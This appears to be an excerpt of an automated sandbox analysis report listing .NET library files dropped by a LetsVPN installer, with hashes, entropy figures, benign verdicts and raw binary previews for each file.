                                                                                                                                                                                                  SHA-512:8350BC4FD80527BA8C8FB12D5ECCCF62BF099DA06016EDEFA56FA0F24FC1EF387220DB1A9B434BE5136360599BC09F8AD92639122D5447143B55330B6ECC1D63
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....w..........." ..0.............R.... ........... ....................... ......J.....`.....................................O....................... ...........4...T............................................ ............... ..H............text...X.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................3.......H........z..@...........,D...............................................(....*..0..l.......r...p.s.........( ....o!......s"....+%...n...%....o#.....~............o$....o%...%.-....,..o......,..o.....*......$.3W..........Ea......f~....-.(....~......o&...*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{ ...*"..} ...*F.~!...('...t....*6.~!....((...*..{"...*"..}"...*..{#...*"..}#...*..{$...*"..}$...*..{%...*"..}%...*..{&...

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.AppCenter.Analytics.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):25120
                                                                                                                                                                                                  Entropy (8bit):6.665914468487181
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:AH9oR6XScb7Fj7t6Yq3b2KZBZVzS+ST6nkc:Ay6XScbJj7t6b3qKj/mC
                                                                                                                                                                                                  MD5:E5D273B75C14961ED64B6D6A847C5AE2
                                                                                                                                                                                                  SHA1:72BFFAE47ED211EFABE455448C821E696BA9075C
                                                                                                                                                                                                  SHA-256:8C7BD931B6535B314BD6DE57ED60B36529348FDFAC50F50055818E042FF8CF8D
                                                                                                                                                                                                  SHA-512:87B66800D0A7CBD58DC87DA33639BC844D937E32B441665966965CF39F9733B400786846581FACCCFE87EF86C1DD855940425FF449A53AD9955765626A38E807
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...,.q..........." ..0..,...........J... ...`....... ..............................p.....`.................................UJ..O....`...............4.. ...........@I..T............................................ ............... ..H............text....*... ...,.................. ..`.rsrc........`......................@..@.reloc...............2..............@..B.................J......H.......`*...............................................................0..H.........~....,...~....*~..........(......~....%-.&s....%...........,..(......*........#<.......0..%.......~..........(...............,..(.....*....................0..........~..........(....(....o....(...+....,..(......*...........".......0..0.......~..........(....(.....o.....(...+....,..(......*.........$.......0..).......~..........(....(......o.......,..(.....*....................0..C........(..

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.AppCenter.Crashes.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):53792
                                                                                                                                                                                                  Entropy (8bit):6.30664826170408
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:9qr8YZ2IPJ1hCmfPzcscksOOWwp/fFCHUHGoH0w8eKYIySh6TOq3b2KZBZHPS+S/:93aJBOkAHaUm08eKYIITB3qKl/mZ1
                                                                                                                                                                                                  MD5:80C2EAC1F7420578A13331614291866A
                                                                                                                                                                                                  SHA1:759C0EF56DB6F407E5796CE6DEE2D8D19EF367F3
                                                                                                                                                                                                  SHA-256:30B86B4326E0C77AB66392BEEA678934BD396D37CEE4C35C358783EA1CD4828B
                                                                                                                                                                                                  SHA-512:A1D118E3B1C6B522FB54ACEE5CC2B48F15044C622A285025D1478A2988B939284E274323E802A1B068B5610A010BF87E6F430689FD7987CE4A8B24D0FAF2E957
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..............." ..0.................. ........... ...................................`.....................................O....................... ...............T............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........D...t..........................................................&...(....*2.r...p(....*..0..'.......~.........(....t............(...+...3.*..0..'.......~.........(....t............(...+...3.*..0..'.......~.........(....t............(...+...3.*..0..'.......~.........(....t............(...+...3.*..0..'.......~.........(....t............(...+...3.*..0..'.......~.........(....t............(...+...3.*..(....*.(....*..(....*.(....*.(....*.(....*.s....zr.-.rM..pro..p(....*..

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.AppCenter.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):143904
                                                                                                                                                                                                  Entropy (8bit):6.0435655988094465
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:YXiDdWM0c7K9ES99d3+uVIQNlHK6Uav1vP8F6D0/5:zdWM0cW9EONvHKwvP8FWw
                                                                                                                                                                                                  MD5:BFFA4E71462CA66C7D8D918C90A341E9
                                                                                                                                                                                                  SHA1:20CA82B113D96225E34720B838AEEBE8F9B2980A
                                                                                                                                                                                                  SHA-256:9BBCCFE3E720F2B6ECB1EAD65C7AA95808DB459F6948B3D68328673D52C4A5B8
                                                                                                                                                                                                  SHA-512:4546BF89CB11FAA9E888DCDA503904EE4E50BF81A9C23BACF7C6F4146F035F97C37D351A7E6DBD040342C4751B8757CFD53B1C66696F2AE58594636DE6FD78BD
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....gu..........." ..0.............f.... ... ....... .......................`......Bb....`.....................................O.... ..|............... ....@..........T............................................ ............... ..H............text...|.... ...................... ..`.rsrc...|.... ......................@..@.reloc.......@......................@..B................H.......H...........PR...........................................................0..H.........~....,...~....*~..........(......~....%-.&s....%...........,..(......*........#<.......0..%.......~..........(...............,..(.....*....................(g...*..(h...*..,..o.......(e...r...p(n...*.(....*..0..#.......~..........(.............,..(.....*..................0..#.......~..........(.............,..(.....*..................0..........~..........(....(....o....(...+....,..(......*..

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Bcl.AsyncInterfaces.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):24608
                                                                                                                                                                                                  Entropy (8bit):6.744944549827833
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:e/f1IDjV9UPPpWoq3b2KZBZeY8CS+ST6nkI:uf1IDjPOPpWL3qKI3C/mO
                                                                                                                                                                                                  MD5:02D5FC80DC55645778A4D78A24723780
                                                                                                                                                                                                  SHA1:13B2CAB89FF056437287369E1728D64943C71577
                                                                                                                                                                                                  SHA-256:2722C7F315E967D9676CE6B5BEB510D6FCEE0D6F5B05AEE1D69A563071D6E618
                                                                                                                                                                                                  SHA-512:78E6F13C680E883022C09E743253EE7A7ACF8F5C50DD3302D244D95D1E3D58ABC66029083320275D6485AC92F710401A064E1740EB67FE2D2329A2A516252DCD
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Q..........." ..0..&...........E... ...`....... ....................................`.................................[E..O....`...............2.. ...........hD..T............................................ ............... ..H............text....%... ...&.................. ..`.rsrc........`.......(..............@..@.reloc...............0..............@..B.................E......H.......4&.......................C........................................(....*..(....*.0....................(....}.....*6.|.....(...+*:.|......(...+*:.|......(...+*2.|....(....*..{....%-.&.|....s.....(....%-.&.{....*"..(....*>..}......}....*..0...........{....o........{....(....*Z..}......}......}....*N.{......{....s ...*N.{.....{.....s ...*v.{.....{....o!....{....s"...*..(....*"..s....*.0.....................s#...*&...s#...*..{$...*"..}$...*.0..F.........{%....Xh}%.....}&.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Expression.Interactions.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):103456
                                                                                                                                                                                                  Entropy (8bit):6.150159893883683
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:jrf5GttgxHXEuRmG5rtkGY4CEmWAxXSSYhhS98ca2Wvsd65FJDlGWwkEyB3qKp+g:P5GttWHXEUx5r65LxXshk8JDIWPBoY/9
                                                                                                                                                                                                  MD5:EF4503A4D4843EE0342E775B66597B48
                                                                                                                                                                                                  SHA1:7C32086B782934EE2A1C3D0F87EA99E916CA2C61
                                                                                                                                                                                                  SHA-256:2116A48BEC23CCCC6B993654AD476E1F833F453548CFC209A9F21196BADB6B0B
                                                                                                                                                                                                  SHA-512:A4052E06CE8C17649FEC8B202AC316B9A44C9196BC7B019E1F31052C2AB77E9E338345B42F8A1E5C51278A51B776941261CCE2B0BC66A77EF542ADD8B596CC6B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...eu.K...........!.....\...........z... ........@.. ...............................0....@..................................y..K....................f.. ............x............................................... ............... ..H............text...$Z... ...\.................. ..`.rsrc................^..............@..@.reloc...............d..............@..B.................z......H...........L...........x...1...P ........................................z...y.k.....bdd I..`..).PsR@... .aL...%:...y.....XDgM.X}..~)2.v-..4..........EAZZ...,..[..H...o5*C.o...5/I.m.!2...#.:.(......}....*:.(......}....*...0..)........{.........(....t......|......(...+...3.*....0..)........{.........(....t......|......(...+...3.*"..(....*"..(....*..*..{....,..{.....o....*.{....o....*2.~....(....*6.~.....(....*F.~....(....td...*6.~.....(....*J.(.....s ...}....*F.(...

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Toolkit.Uwp.Notifications.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):163360
                                                                                                                                                                                                  Entropy (8bit):6.226529376890851
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:c4burBkDijpS3+n1Sr5ePVM761+fAwb0A/z:ciikDiw3+1af761+rY+
                                                                                                                                                                                                  MD5:D80339E7A59BA5938DDA47AB253C3F5B
                                                                                                                                                                                                  SHA1:9AF9D1AB6EB6E73ED0E42EC45D76C29BDA7FA5C8
                                                                                                                                                                                                  SHA-256:B649549A1E2A8CD22A14F6202AD80AB30119937CC1D69B2FBDD3D9A1FB37A13E
                                                                                                                                                                                                  SHA-512:126FC5A50D36D7734D2BBCD63703D65720EB7DC0548C8275771EDED722A6F3F26787845F86A2C9D76364E1DEA204750E41140DB5EF714D2A772CCF236CF1267A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....G..........." ..0..F...........e... ........... ...............................l....`.................................Qe..O.......p............P.. ...........\d..T............................................ ............... ..H............text....E... ...F.................. ..`.rsrc...p............H..............@..@.reloc...............N..............@..B.................e......H.......l...p....................c........................................(*...*..(*...*^.(*......d...%...}....*:.(*.....}....*:.(*.....}....*V!..R{*....s+........*..{....*"..}....*....0..Z........(....o,...-.r...ps-...zs0.....(....o.....+..o/.....o+....o5...o0....o....-....,..o......*........*.$N......J.s1...}.....(2...*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*6.|.....(I...*..{....*"..}....*..{....*"..}....*V.(....-.r...p*.(....*..(J...%.(....o>...%.(....o@

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Web.WebView2.Core.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):146464
                                                                                                                                                                                                  Entropy (8bit):5.810766544493159
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:LSiitDW10Oug94BeCCepM1STU/xnW+W6jfM0amyw0VzGLC1grekKtk0do/9o8afk:uiNang9meCCepM1ST+xnW+W6jfM0amyw
                                                                                                                                                                                                  MD5:CE7AC0EA44FF270ADD7888FE3952A592
                                                                                                                                                                                                  SHA1:9B2193D472191A303B37CD2F0CBA5493E367BE77
                                                                                                                                                                                                  SHA-256:24BD1E22D0F674442D607C0552AC2C3F55EBCE8B3D81D6BD73D244AA2133D5C3
                                                                                                                                                                                                  SHA-512:D4DC9509200BBD00CE2480488C8E4A19CB8DCDEBF7F1B33BBF0A45B1441C2AE3F33EC8CFA374892632E1A8BEB8A7318766750678E97D877295995837DC5883BA
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...vJ.`.........." ..0..............$... ...@....... ..............................~.....@..................................$..O....@.................. ....`......T#............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................$......H........q......................".......................................0..H.........(....o.........,....+..{.........,....(....o....s`...}......{.....+..*.0..a.........(.........,R..(....o......uQ........, .sd.....uQ........{....o6.....+...r...ps........og......*....0..>.........{.........,%....{....ti...}.........ru..p.s)...z..{.....+..*...........$......&...}....*z..}.....(*.......}.....(.....*>.(....o.......*R.(.....-..+..o.....*...0............(....o....(.....+..*R..(..

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Web.WebView2.WinForms.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):31776
                                                                                                                                                                                                  Entropy (8bit):6.576538838641731
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:3LNoCdzhFQj/hJTBbGXZDDcULH4JVrwRSgBucQgJa5/Zi/dUDyqz1POMrhq3b2KY:3LqCHmTxGXZDDcULH4JVrwRSgBuvgJad
                                                                                                                                                                                                  MD5:C1994BBFAF6A739406029ED8676659D0
                                                                                                                                                                                                  SHA1:31530C18F2346BCCCE9ED1C78C574CD984C1F6EF
                                                                                                                                                                                                  SHA-256:6DD308156CF036D9972BE22FD6A5BA4767A5C22C9C7DA452F260CE9E0C2A083A
                                                                                                                                                                                                  SHA-512:2FB3FAC797357993D88C282C520D26C2EEB25BE85D82CCA092283E17B47C174DA842AACA8C128BB7C055E57A8020A221EA0EEA9BF340129E8B5ACC19D43E4938
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...dCd..........." ..0..D...........b... ........... ...............................(....`..................................b..O....................N.. ............a..8............................................ ............... ..H............text....B... ...D.................. ..`.rsrc................F..............@..@.reloc...............L..............@..B.................b......H........0..h0..................Da........................................(....*..{....*>..}......}....*..{....*>..}......}....*..{....*>..}......}....*..{....-%..(.....(......(......s....(....}.....{....*r.#.......?}.....(.....(I...*..,..(....,.*.(....,..(.....{....,..{....o......(....*.0..................s....(............s....(.....(.......?...s ...o!....(.......>...s"...o#....(.......A...s$...o%....(.......@...s&...o'....(.......B...s(...o)....{.......C...s*...o+....{....

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Web.WebView2.Wpf.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):34336
                                                                                                                                                                                                  Entropy (8bit):6.562572630329577
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:knD8wecsVygSvqa8ZDPLryER0SO4JVrTYIWUpDkS/Ka5/Bi/W7v4F4zfKwaq3b2U:k7eN4vqa8ZDPLryER0SO4JVrTYIWUpDF
                                                                                                                                                                                                  MD5:C0A30AA26D512873D0B9FEA741870AF1
                                                                                                                                                                                                  SHA1:FD9599E524B3AA48198F0F4D9DF676766ED02F61
                                                                                                                                                                                                  SHA-256:B2AEFFBC045D8B20D4F3F2EC35A16A4F68A1034392DCC22DECAEE814BB600C20
                                                                                                                                                                                                  SHA-512:EBC71E2036F9C84F6214BC4418715C2A7A2B17D00AE7E91FDC5A65BFB26AC21E814362B62D249F0B5BD85FBF4E834204E5FCF5EBD6BFC85F8B6B86D7C6B2BFE6
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...]............" ..0..P...........n... ........... ..............................jk....`.................................Gn..O....................X.. ...........xm..8............................................ ............... ..H............text....N... ...P.................. ..`.rsrc................R..............@..@.reloc...............V..............@..B................{n......H........5...7...................l........................................(....*F.~....(....t:...*6.~.....(....*F.~....(....t:...*6.~.....(....*F.~....(....t:...*6.~.....(....*6.t.....}....*..{....-%..(.....(......(......s....(....}.....{....*..0..........r...p.:...(.........(............s....s....(.........r1..p.:...(.........(............s....s....(.........rO..p.:...(.........(............s....s....(.........*J.s....}.....(....*F.~....(....t....*6.~.....(....*V.t....o....,

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Win32.Primitives.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.951071216277355
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:SN9VWhX3W+hqWOHlLf2KQcvBZ9sGQtS+ShjmM6IGBkSXC:SGbq3b2KZBZZOS+ST6nk1
                                                                                                                                                                                                  MD5:45A59E4D60F6970DCA66AB643AA8C8CD
                                                                                                                                                                                                  SHA1:2A25F0B075E9B39E104B2741A389C820ABE74F70
                                                                                                                                                                                                  SHA-256:FD532F01EC78C8E93AAB9C9349A5106966B3065F42E39989FEC7EB5F15B3293C
                                                                                                                                                                                                  SHA-512:72009C298FEC97ED2142B37D5A5FDFCED65DAAF43FBB45754035CCFD62D0D0F0DB465050B747CAF86223691E49544471FD6DCAB6604D96CF47390186E69D32BD
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?..Y.........." ..0..............(... ...@....... ..............................m.....@.................................T(..O....@..0............... ....`.......'............................................... ............... ..H............text........ ...................... ..`.rsrc...0....@......................@..@.reloc.......`......................@..B.................(......H.......P ..L....................&......................................BSJB............v4.0.30319......l...|...#~......<...#Strings....$.......#US.(.......#GUID...8.......#Blob......................3......................................................\.....0...........D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.7...K.W...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Win32.Registry.AccessControl.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):22560
                                                                                                                                                                                                  Entropy (8bit):6.7753295378501
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:kSk7xWUHIx0S3WF7rWthqWOHlLf2KQcvBZ9fGS+ShjmM6IGBkSJ6Z:k/0UHU0SOaq3b2KZBZMS+ST6nkZZ
                                                                                                                                                                                                  MD5:2D864C6E9E03F41D091BDDDD392B38DF
                                                                                                                                                                                                  SHA1:FA367DA623EAA3A114DB0EC35599E63E53A068B3
                                                                                                                                                                                                  SHA-256:D7EA78A691416DCB9BC10A615CA41B13A5F2698DE414E2C80867B6F20B832508
                                                                                                                                                                                                  SHA-512:EE2BCD1D40E111DA22F76331CA1BC2FA48E913DBC2A99CF4DFC28883556B86C7EDB903AFDE8524748804572F6EB6043223A1EB99862F6061E94ECF4CC5A373F0
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...9.2..........." ..0..............=... ...@....... ....................................`..................................<..O....@...............*.. ....`.......;..T............................................ ............... ..H............text........ ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......(..............@..B.................<......H....... "...............8..(... ;........................................(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*:.(......}....*..{....*"..(....*"..(....*"..(....*"..(....*"..(....*..(....*..(....*..(....*..(....*:.(......}....*..{....*:.(......}....*..{....*:.(......}....*..{....*..(....*:.(......}....*..{....*^.(...........%...}....*:.(......}....*..{....*z.(......}...........%...}....*V.(......}......}....*..{....*..{....*V.-.r...ps....z

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Win32.Registry.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):29216
                                                                                                                                                                                                  Entropy (8bit):6.47574588426455
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:N4QVrxViR9mlxdgq3b2KZBZ6aS+ST6nke:FdxViR9mlxdT3qKsa/mQ
                                                                                                                                                                                                  MD5:C969E3ED73E69BE104174C989080CC51
                                                                                                                                                                                                  SHA1:9CB185BE071F23406E7B961E0996EDC71A61834E
                                                                                                                                                                                                  SHA-256:4AB704100BA1E5248B8E05934AD9597C0F6DA0306E4AE37A8F2F8CFAA48B1921
                                                                                                                                                                                                  SHA-512:8F1DF0B377FC098CD909EE3C28E5AABF441954919AC11AD591E89C5FF2A0EA23637C8537A3528429A9C6DBE376E1A13A68D910AC600486EF6ABAF32D179C4248
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....j............" ..0..:..........jX... ...`....... ....................................`..................................X..O....`...............D.. ...........$W..T............................................ ............... ..H............text...p8... ...:.................. ..`.rsrc........`.......<..............@..@.reloc...............B..............@..B................LX......H........$..8"...........G.......V.......................................~....*..0..1.......(....,..%-.&.*..(.....o.......&...,...o....,..*.*....................(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*..,&(....,..r...pr...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*...(....*.(....,.r...p......%...%...%...(....*....(....*.(....,"r...p......%...%...%...%....(....*......(

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Win32.SystemEvents.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):25120
                                                                                                                                                                                                  Entropy (8bit):6.675783274544051
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:tdIaf4rbDyIb/KcWCNRWr7JW/yhqWOHlLf2KQcvBZ9B/MkS+ShjmM6IGBkS5:t+THDHbs6GWGq3b2KZBZokS+ST6nkS
                                                                                                                                                                                                  MD5:D6E4174C9B4EF259C9CB5F37B509F842
                                                                                                                                                                                                  SHA1:2061F234A0004F4A0F17CB41DF611497943CEC05
                                                                                                                                                                                                  SHA-256:579FC3FE3BF74F2F48A2416DE7EE7BF87BF7FBF8749EEBF4D170D51A5F31BD79
                                                                                                                                                                                                  SHA-512:E97DCB302BC88D81A060C5D18024528DA4B3BA696EA082E2C3FFF4298B23A72C2317F51D3A1A073A0878CA293D3D1D8EF2DC17CAF18C60DCA3C0365658E6B81C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...8............." ..0..*...........H... ...`....... ...............................)....`.................................yH..O....`..d............4.. ............G..T............................................ ............... ..H............text....(... ...*.................. ..`.rsrc...d....`.......,..............@..@.reloc...............2..............@..B.................H......H........$...............A.......G.......................................~....*..0..........(....,..*..(.....o.......&...*...................0...........(.......(....-..,..*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*..,&(....,..r...pr...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*...(....*.(....,.r...p......%...%...%...(....*....(....*.(....,"r...p......%...%...%...%..

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\Mono.Cecil.Mdb.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):54816
                                                                                                                                                                                                  Entropy (8bit):6.292347937187533
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:Mr59g98C87KHeBUbwgKirbdwMRTzAt9l63qKk/mI8:Mr5HC87rUbwgKirJw1Dl6g/B8
                                                                                                                                                                                                  MD5:33CA4672410B18BB3C83114E36A6B5DC
                                                                                                                                                                                                  SHA1:E2BFF454FFA6C97C9BF5B343708FCD844404BF32
                                                                                                                                                                                                  SHA-256:24352BC45172AADBDC732016CBB57705630CE2B87F50EC915F28DFDE8172B739
                                                                                                                                                                                                  SHA-512:C5C52435F90B9598B901DA27B3E3B95C8E7D2256C8F7944CEAFAE49BD34C3169B16DFFCEEE5056F31AC70272EA4458F870D5D601364E9D7B663BEE631D80E054
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
